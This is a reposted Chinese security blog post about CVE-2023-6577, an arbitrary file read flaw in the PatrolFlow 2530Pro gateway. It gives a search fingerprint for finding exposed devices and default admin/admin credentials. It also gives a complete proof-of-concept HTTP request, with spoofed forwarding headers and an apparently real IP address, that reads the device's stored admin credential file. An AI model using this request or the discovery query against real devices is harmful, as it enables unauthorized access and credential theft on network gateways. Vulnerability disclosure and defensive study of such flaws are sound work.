CVE-2023-6577 | 北京百绰PatrolFlow 2530Pro 路径遍历

admin 2023年12月16日20:38:09评论34 views字数 1342阅读4分28秒阅读模式
免责声明  由于传播、利用WK安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,WK安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

CVE-2023-6577 | 北京百绰PatrolFlow 2530Pro 路径遍历

| 0x01 漏洞介绍

北京百绰PatrolFlow 2530Pro是一款电信级信息安全网关,支持多条Internet线路的带宽叠加,扩大网络出口带宽;4个10/100/1000M接口,4个SFP千兆接口,并支持扩展16个千兆光口;支持bypass功能;具有防火墙及VPN功能;丰富的Web推送功能;集中网管功能,提供网络级网管平台PatrolVision,实现PatrolFlow的集群管理;适用于内网用户数40000人左右的网络 。

| 0x02 影响版本

北京百绰PatrolFlow 2530Pro

| 0x03 语法特征

title:"PatrolFlow"

CVE-2023-6577 | 北京百绰PatrolFlow 2530Pro 路径遍历

| 0x04 漏洞复现

百卓网络PatrolFlow多业务安全网关智能管理平台存在任意文件读取漏洞

版本:PatrolFlow-AM-2530Pro

路线:/log/mailsendview.php

账号/密码:admin/admin

CVE-2023-6577 | 北京百绰PatrolFlow 2530Pro 路径遍历

POC

使用/boot/phpConfiguration/tb_admin.txt构建文件参数,读取登录账号密码。有了账号密码,就可以直接登录后台或者读取系统中的任意文件。

GET /log/mailsendview.php?file=/boot/phpConfig/tb_admin.txt&type=Sina WebMail HTTP/1.1Host: 124.192.129.106:8443Cookie: PHPSESSID=4743c37524a43f4ac23abeed72331bd6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1X-Forwarded-For: 1.1.1.1X-Originating-Ip: 1.1.1.1X-Remote-Ip: 1.1.1.1X-Remote-Addr: 1.1.1.1Te: trailersConnection: close

CVE-2023-6577 | 北京百绰PatrolFlow 2530Pro 路径遍历

参考链接

https://github.com/kpz-wm/cve/blob/main/Any_file_read.md

原文始发于微信公众号(WK安全):CVE-2023-6577 | 北京百绰PatrolFlow 2530Pro 路径遍历

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月16日20:38:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-6577 | 北京百绰PatrolFlow 2530Pro 路径遍历http://cn-sec.com/archives/2307349.html

发表评论

匿名网友 填写信息